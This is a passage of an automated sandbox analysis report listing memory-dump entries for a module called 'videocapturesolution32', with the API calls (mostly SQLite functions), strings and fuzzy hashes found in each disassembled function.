                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                          • String ID: e
                                                          • API String ID: 786425071-4024072794
                                                          • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                          • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                          • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                          • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_exec
                                                          • String ID: sqlite_master$sqlite_temp_master$|
                                                          • API String ID: 2141490097-2247242311
                                                          • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                          • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                          • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                          • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                          • String ID:
                                                          • API String ID: 3422960571-0
                                                          • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                          • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                          • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                          • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                          APIs
                                                            • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                          • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                          • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                          • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                          • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID:
                                                          • API String ID: 683514883-0
                                                          • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                          • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                          • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                          • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                          APIs
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                          • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                          • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 1903298374-0
                                                          • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                          • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                          • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                          • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                          APIs
                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                          • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                          • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                          • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                          • String ID:
                                                          • API String ID: 1894464702-0
                                                          • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                          • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                          • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                          • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                          APIs
                                                            • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                          • sqlite3_log.SQLITE3 ref: 609253E2
                                                          • sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 3336957480-0
                                                          • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                          • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                          • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                          • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                          APIs
                                                          • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                          • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                          • sqlite3_data_count.SQLITE3 ref: 60961465
                                                          • sqlite3_column_value.SQLITE3 ref: 60961476
                                                          • sqlite3_result_value.SQLITE3 ref: 60961482
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                          • String ID:
                                                          • API String ID: 3091402450-0
                                                          • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                          • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                          • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                          • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                          • String ID:
                                                          • API String ID: 251237202-0
                                                          • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                          • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                          • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                          • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                          APIs
                                                          • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                          • String ID:
                                                          • API String ID: 4225432645-0
                                                          • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                          • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                          • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                          • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                          • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                          • String ID:
                                                          • API String ID: 251237202-0
                                                          • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                          • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                          • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                          • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: ($string or blob too big$|
                                                          • API String ID: 632333372-2398534278
                                                          • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                          • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                          • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                          • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                          APIs
                                                          • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stricmp
                                                          • String ID: BINARY
                                                          • API String ID: 912767213-907554435
                                                          • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                          • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                          • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                          • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Query
                                                          • String ID: @
                                                          • API String ID: 3618607426-2766056989
                                                          • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                          • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                          • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                          • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 60928353
                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                          • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                          • sqlite3_free.SQLITE3 ref: 609283B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                          • String ID: d
                                                          • API String ID: 211589378-2564639436
                                                          • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                          • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                          • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                          • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                          • API String ID: 1646373207-2713375476
                                                          • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                          • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                          • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                          • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
